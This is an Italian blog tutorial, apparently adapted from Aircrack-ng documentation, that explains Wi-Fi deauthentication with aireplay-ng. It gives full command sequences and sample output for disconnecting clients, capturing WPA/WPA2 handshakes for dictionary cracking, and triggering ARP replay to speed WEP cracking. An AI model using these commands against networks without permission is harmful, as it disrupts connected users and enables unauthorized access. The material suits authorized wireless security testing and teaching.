Deautenticazione di un client con Aircrack-NG


In questo post viene illustrato il metodo di deautenticazione di un client connesso ad un AP, utilizzando Aircrack-NG. Questa tecnica può tornarvi utile per velocizzare il craccaggio di una chiave  wep qual’ora tentaste di attaccare un AP a cui sono connessi dei client ( 1 e 2 ) o per catturare un handshake di una WPA ( 1 e 2 )

LINK ORIGINALE

  • DEAUTENTICAZIONE

DESCRIZIONE

Questo attacco invia pacchetti disassociati ad uno o più client già associati ad uno specifico access point. Si può voler disassociare i client per diverse ragioni:

– Recuperare un ESSID nascosto. Si tratta di un ESSID che non sta venendo trasmesso. Detto altrimenti, è "celato".
– Catturare le ‘strette di mano’ WPA/WPA2 forzando la riautenticazione dei client.
– Generare richieste ARP (su Windows i client a volte eliminano la loro cache ARP quando vengono disconnessi)

Ovviamente, questo attacco è totalmente inutile se non ci sono client wireless associati o con false autenticazioni.

UTILIZZO
_____________________________________
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
____________________________________

Dove:

– 0 significa deautenticazione
– 1 è il numero di deauth che inviate (potete mandarne di multipli se desiderate); 0 corrisponde a mandarli di continuo
– -a 00:14:6C:7E:40:80 è l’indirizzo MAC dell’access point
– -c 00:0F:B5:34:30:30 è l’indirizzo MAC del client da deautenticare; se viene tralasciato, tutti i client vengono deautenticati
– ath0 è il nome dell’interfaccia

  • ESEMPI DI UTILIZZO

DEAUTENTICAZIONE TIPICA

Per prima cosa, individuate un client che sia connesso. Avrete bisogno dell’indirizzo MAC per il comando seguente:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Dove:

– 0 sta per deautenticazione
– 1 è il numero di deauth che inviate (potete mandarne di multipli se desiderate)
– -a 00:14:6C:7E:40:80 è l’indirizzo MAC dell’access point
– -c 00:0F:B5:34:30:30 è l’indirizzo MAC del client che state deautenticando
– ath0 è il nome dell’interfaccia

Ecco come appare l’output:
________________________________________
11:09:28  Sending DeAuth to station   — STMAC: [00:0F:B5:34:30:30]
________________________________________

CATTURA DELLA ‘STRETTA DI MANO’ WPA/WPA2 CON UN’ATHEROS
______________________________________________________
airmon-ng start ath0
airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0  (switch to another console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
(wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap
______________________________________________________

Ecco la spiegazione dei comandi qui sopra:

airodump-ng -c 6 –bssid 00:14:6C:7E:40:80 -w out ath0

Dove:

– -c 6 è il canale su cui sintonizzarsi
– -bssid 00:14:6C:7E:40:80 limita i pacchetti raccolti a quest’access point
– -w out è il prefisso del nome del file che deve essere scritto
– ath0 è il nome dell’interfaccia

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0

Dove:

– -0 significa attacco di deautenticazione
– 5 è il numero di gruppi di pacchetti di deautenticazione da inviare
– -a 00:14:6C:7E:40:80 è l’indirizzo MAC dell’access point
– -c 00:0F:B5:AB:CB:9D è l’indirizzo MAC del client da deautenticare
– ath0 è il nome dell’interfaccia

Ecco come appare l’output di "aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0"
________________________________________________
 12:55:56  Sending DeAuth to station   — STMAC: [00:0F:B5:AB:CB:9D]
 12:55:56  Sending DeAuth to station   — STMAC: [00:0F:B5:AB:CB:9D]
 12:55:57  Sending DeAuth to station   — STMAC: [00:0F:B5:AB:CB:9D]
 12:55:58  Sending DeAuth to station   — STMAC: [00:0F:B5:AB:CB:9D]
 12:55:58  Sending DeAuth to station   — STMAC: [00:0F:B5:AB:CB:9D]
________________________________________________


RICHIESTA DI GENERAZIONE ARP CON UNA SCHEDA PRISM2

_______________________________________________
airmon-ng start wlan0
airodump-ng -c 6 -w out –bssid 00:13:10:30:24:9C wlan0  (switch to another console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
_______________________________________________

Dopo aver inviato i dieci batch di pacchetti di deautenticazione, iniziamo ad intercettare le richieste ARP con l’attacco -3. L’opzione -h è obbligatoria e deve essere l’indirizzo MAC di un client associato.

Se il driver è wlan-ng dovete eseguire lo script airmon-ng (a meno che non sappiate cosa immettere) altrimenti la scheda non verrà configurata correttamente per l’iniezione.

  • CONSIGLI PER L’USO

Di solito, è più efficace concentrarsi su una stazione specifica, utilizzando il parametro -c.

I pacchetti di deautenticazione vengono inviati direttamente dal vostro PC ai client. Per questo motivo dovete essere fisicamente abbastanza vicini ai client per far sì che le [trasmissioni] della vostra scheda wireless li raggiungano.

  • RISOLUZIONE DEI PROBLEMI D’USO

Consultate gli argomenti generali di risoluzione dei problemi in aireplay-ng: aireplay-ng usage troubleshooting.

  1. Nessun commento ancora.
(non verrà pubblicata)